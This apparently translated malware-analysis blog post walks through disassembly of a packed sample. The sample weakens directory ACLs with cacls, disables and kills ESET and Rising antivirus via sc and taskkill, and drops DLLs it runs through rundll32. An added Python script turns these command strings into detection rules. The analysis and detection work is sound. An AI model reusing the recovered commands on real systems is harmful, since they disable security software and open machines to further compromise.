A quick analysis of a virus I happened to catch

I actually got infected with this virus by accident back before the summer break, but since my machine had Shadow System (影子系统) installed it did no real damage. I kept a sample of the virus meaning to analyze it, and then kept putting it off until now.
The virus consists of three files: 1.exe, ctfmen.exe and explorer.exe. Let's analyze 1.exe first; the other two can wait until I have time.
Checking the packer with PEiD shows "NsPacK V3.7 -> LiuXingPing". Very nice, very powerful; never heard of it, but you can tell from the name it's no serious packer, so it's unpacked in seconds.
[quote]
004013FC E8 FFFBFFFF call 00401000 ; resolve the needed function addresses from the system DLLs
00401401 BE 68454000 mov esi, 00404568 ; ASCII "907654"
00401406 56 push esi
00401407 FF15 3C304000 call dword ptr [40303C] ; kernel32.GlobalFindAtomA
0040140D 66:85C0 test ax, ax ; look up the global atom
00401410 0F87 4A0D0000 ja 00402160 ; nonzero means the virus is already running: exit
[/quote]
After a long stretch of pointless operations on eax we reach the code above. It only lets a single instance of the program run. Continuing:
[quote]
00401916 66:81BD E8FEFFF>cmp word ptr [ebp-118], 7D7
0040191F 0F86 42010000 jbe 00401A67
00401925 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
0040192B 56 push esi
0040192C 50 push eax
0040192D FF15 8C454000 call dword ptr [40458C] ; kernel32.GetWindowsDirectoryA
00401933 8B3D 4C304000 mov edi, dword ptr [40304C] ; msvcrt.sprintf
00401939 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
0040193F 50 push eax
00401940 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401946 68 C0444000 push 004044C0 ; ASCII "cmd /c cacls %s /e /p everyone:f"
0040194B 50 push eax
0040194C FFD7 call edi
0040194E 83C4 0C add esp, 0C
00401951 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401957 53 push ebx
00401958 50 push eax
00401959 FF15 78454000 call dword ptr [404578] ; WinExec (runs cacls to change the access permissions of the system directory; same below)
0040195F 8B1D 1C304000 mov ebx, dword ptr [40301C] ; kernel32.GetTempPathA
00401965 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
0040196B 50 push eax
0040196C 56 push esi
0040196D FFD3 call ebx
0040196F 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
00401975 50 push eax
00401976 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
0040197C 68 9C444000 push 0040449C ; ASCII "cmd /c cacls ""%s"" /e /p everyone:f"
00401981 50 push eax
00401982 FFD7 call edi
00401984 83C4 0C add esp, 0C
00401987 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
0040198D 6A 00 push 0
0040198F 50 push eax
00401990 FF15 78454000 call dword ptr [404578] ; WinExec (runs cacls to change the access permissions of the user's temp folder)
00401996 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
0040199C 50 push eax
0040199D 56 push esi
0040199E FFD3 call ebx
004019A0 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
004019A6 50 push eax
004019A7 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
004019AD 68 74444000 push 00404474 ; ASCII "cmd /c sc config ekrn start= disabled"
004019B2 50 push eax
004019B3 FFD7 call edi
004019B5 83C4 0C add esp, 0C
004019B8 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
004019BE 6A 00 push 0
004019C0 50 push eax
004019C1 FF15 78454000 call dword ptr [404578] ; WinExec (disables the ESET Smart Security antivirus service at boot)
004019C7 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
004019CD 50 push eax
004019CE 56 push esi
004019CF FFD3 call ebx
004019D1 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
004019D7 50 push eax
004019D8 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
004019DE 68 54444000 push 00404454 ; ASCII "cmd /c taskkill /im ekrn.exe /f"
004019E3 50 push eax
004019E4 FFD7 call edi
004019E6 83C4 0C add esp, 0C
004019E9 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
004019EF 6A 00 push 0
004019F1 50 push eax
004019F2 FF15 78454000 call dword ptr [404578] ; WinExec (kills the ESET Smart Security antivirus)
004019F8 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
004019FE 50 push eax
004019FF 56 push esi
00401A00 FFD3 call ebx
00401A02 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
00401A08 50 push eax
00401A09 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401A0F 68 34444000 push 00404434 ; ASCII "cmd /c taskkill /im egui.exe /f"
00401A14 50 push eax
00401A15 FFD7 call edi
00401A17 83C4 0C add esp, 0C
00401A1A 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401A20 6A 00 push 0
00401A22 50 push eax
00401A23 FF15 78454000 call dword ptr [404578] ; WinExec (kills the ESET NOD32 Smart Security 3.0 main program)
00401A29 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
00401A2F 50 push eax
00401A30 56 push esi
00401A31 FFD3 call ebx
00401A33 8D85 E0FCFFFF lea eax, dword ptr [ebp-320]
00401A39 50 push eax
00401A3A 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401A40 68 10444000 push 00404410 ; ASCII "cmd /c taskkill /im ScanFrm.exe /f"
00401A45 50 push eax
00401A46 FFD7 call edi
00401A48 83C4 0C add esp, 0C
00401A4B 8D85 E4FDFFFF lea eax, dword ptr [ebp-21C]
00401A51 6A 00 push 0
00401A53 50 push eax
00401A54 FF15 78454000 call dword ptr [404578] ; WinExec (kills Rising!)
00401A5A 68 88130000 push 1388
00401A5F FF15 18304000 call dword ptr [403018] ; Sleep (sleep for 5 seconds)
00401A65 33DB xor ebx, ebx
00401A67 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401A6D 56 push esi
00401A6E 50 push eax
00401A6F FF15 8C454000 call dword ptr [40458C] ; kernel32.GetWindowsDirectoryA
00401A75 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401A7B 68 FC434000 push 004043FC ; ASCII "\system32\func.dll"
00401A80 50 push eax
00401A81 E8 F4060000 call 0040217A ; jmp to msvcrt.strcat
00401A86 66:81BD E8FEFFF>cmp word ptr [ebp-118], 7D7
00401A8F 59 pop ecx
00401A90 59 pop ecx
00401A91 BF F8434000 mov edi, 004043F8 ; ASCII "BIN"
00401A96 76 21 jbe short 00401AB9
00401A98 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401A9E 50 push eax
00401A9F 57 push edi
00401AA0 68 95000000 push 95
00401AA5 E8 9CF6FFFF call 00401146 ; copy func.dll, appended in the resource section, into C:\Windows\System32\
00401AAA 83C4 0C add esp, 0C
00401AAD 53 push ebx
00401AAE 68 D8434000 push 004043D8 ; ASCII "rundll32.exe func.dll, droqp"
00401AB3 FF15 78454000 call dword ptr [404578] ; WinExec (uses rundll32.exe to call func.dll's droqp function)
00401AB9 8D85 DCFBFFFF lea eax, dword ptr [ebp-424]
00401ABF 56 push esi
00401AC0 50 push eax
00401AC1 53 push ebx
00401AC2 FF15 2C304000 call dword ptr [40302C] ; kernel32.GetModuleFileNameA
00401AC8 68 204E0000 push 4E20
00401ACD FF15 18304000 call dword ptr [403018] ; kernel32.Sleep
00401AD3 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401AD9 56 push esi
00401ADA 50 push eax
00401ADB FF15 24304000 call dword ptr [403024] ; kernel32.GetWindowsDirectoryA
00401AE1 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401AE7 68 CC434000 push 004043CC ; ASCII "\phpi.dll"
00401AEC 50 push eax
00401AED E8 88060000 call 0040217A ; jmp to msvcrt.strcat
00401AF2 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401AF8 50 push eax
00401AF9 57 push edi
00401AFA 68 8F000000 push 8F
00401AFF E8 42F6FFFF call 00401146 ; copy phpi.dll, appended in the resource section, into C:\Windows\
[/quote]
After a long stretch of repeated calls to GetSystemDirectory (author, don't you get tired of this...), we reach the code above. It drops a DLL that gets invoked through rundll32.exe, with the droqp function as the entry point. Then it drops a second DLL. After another stretch of repeated calls... we arrive at the loading part below.
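Every one of the sprintf'd strings above ends up as a process-creation event on the victim, which makes them easy to alert on. The following is an added example (not code from the original post or from the sample) that encodes the four behaviours seen in this block, weakening ACLs with cacls, disabling an AV service with sc, killing AV processes with taskkill, and invoking an export of a bare DLL name via rundll32, as detection rules and runs them over constructed process-creation records. The AV name list and the rundll32 allowlist are my own assumptions, seeded from the strings in the listing.

```python
import re

# Constructed sample process-creation records (pid, command line); not taken
# from the original post. The first seven mirror the strings recovered from
# the 1.exe disassembly, the last three are benign controls that must not fire.
SAMPLE_EVENTS = [
    (1201, r'cmd /c cacls C:\WINDOWS /e /p everyone:f'),
    (1202, r'cmd /c cacls "C:\DOCUME~1\user\LOCALS~1\Temp\" /e /p everyone:f'),
    (1203, r'cmd /c sc config ekrn start= disabled'),
    (1204, r'cmd /c taskkill /im ekrn.exe /f'),
    (1205, r'cmd /c taskkill /im egui.exe /f'),
    (1206, r'cmd /c taskkill /im ScanFrm.exe /f'),
    (1207, r'rundll32.exe func.dll, droqp'),
    (1301, r'cmd /c dir C:\Users'),
    (1302, r'rundll32.exe shell32.dll,Control_RunDLL'),
    (1303, r'cmd /c taskkill /im notepad.exe /f'),
]

# Security-product service/process names from the sample's kill list
# (ESET: ekrn, egui; Rising: ScanFrm). Assumed list; extend for your estate.
AV_NAMES = {"ekrn", "egui", "scanfrm"}

# Assumed allowlist of DLLs that Windows itself commonly passes to rundll32
# by bare name, so that routine control-panel launches do not alert.
KNOWN_RUNDLL_TARGETS = {"shell32.dll", "user32.dll", "advapi32.dll", "printui.dll"}

RE_CACLS = re.compile(r'\bcacls\b.*\beveryone:f\b', re.I)
RE_SC_DISABLE = re.compile(r'\bsc\b\s+config\s+(\S+)\s+start=\s*disabled', re.I)
RE_TASKKILL = re.compile(r'\btaskkill\b.*?/im\s+(\S+)', re.I)
RE_RUNDLL = re.compile(r'\brundll32(?:\.exe)?\s+(\S+?\.dll)\s*,\s*(\w+)', re.I)


def classify(cmdline):
    """Return the list of rule names that fire on a single command line."""
    hits = []

    # Granting everyone full control on a directory is what the sample does
    # to both the Windows directory and the user's temp folder.
    if RE_CACLS.search(cmdline):
        hits.append("acl_weakening")

    # "sc config <svc> start= disabled" aimed at a security product.
    m = RE_SC_DISABLE.search(cmdline)
    if m and m.group(1).lower() in AV_NAMES:
        hits.append("av_service_disabled")

    # "taskkill /im <image>" aimed at a security product (strip .exe first).
    m = RE_TASKKILL.search(cmdline)
    if m:
        target = m.group(1).lower()
        if target.endswith(".exe"):
            target = target[:-4]
        if target in AV_NAMES:
            hits.append("av_process_killed")

    # rundll32 with a bare DLL name is resolved through the DLL search path,
    # which is exactly how the dropped func.dll in system32 gets picked up.
    m = RE_RUNDLL.search(cmdline)
    if m:
        dll = m.group(1).lower()
        if "\\" not in dll and dll not in KNOWN_RUNDLL_TARGETS:
            hits.append("rundll32_unknown_dll")

    return hits


def scan(events):
    """Map pid -> rule names for every event that fires at least one rule."""
    findings = {}
    for pid, cmd in events:
        hits = classify(cmd)
        if hits:
            findings[pid] = hits
    return findings


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

In a real deployment these records would come from Sysmon event 1 or the equivalent EDR feed; the point of the rules is that the attack chain is noisy at the process-creation layer even when the packer hides the strings on disk. The rundll32 rule is a heuristic rather than a signature: it will also flag legitimate third-party software that calls rundll32 with a relative DLL name, so tune the allowlist before alerting on it.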
[quote]
00401BCF 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00401BD5 50 push eax ; C:\Windows\phpi.dll
00401BD6 FF15 04304000 call dword ptr [403004] ; kernel32.LoadLibraryA
00401BDC 3BC3 cmp eax, ebx
00401BDE 8945 FC mov dword ptr [ebp-4], eax
00401BE1 0F84 79050000 je 00402160
[/quote]
Once loading is done there is more useless code, until we reach the part that fetches a function from the DLL and calls it.
[quote]
00401FF2 68 A8404000 push 004040A8 ; ASCII "FF"
00401FF7 FF75 FC push dword ptr [ebp-4]
00401FFA FF15 00304000 call dword ptr [403000] ; kernel32.GetProcAddress
00402000 53 push ebx
00402001 8945 FC mov dword ptr [ebp-4], eax
00402004 FFD7 call edi ; kernel32.GetModuleHandleA
00402006 8D85 04F2FFFF lea eax, dword ptr [ebp-DFC]
0040200C 50 push eax
0040200D 53 push ebx
0040200E 53 push ebx
0040200F FF55 FC call dword ptr [ebp-4] ; call FF
[/quote]
That's all the key code; I'll write up the DLL analysis in a few days when I have time orz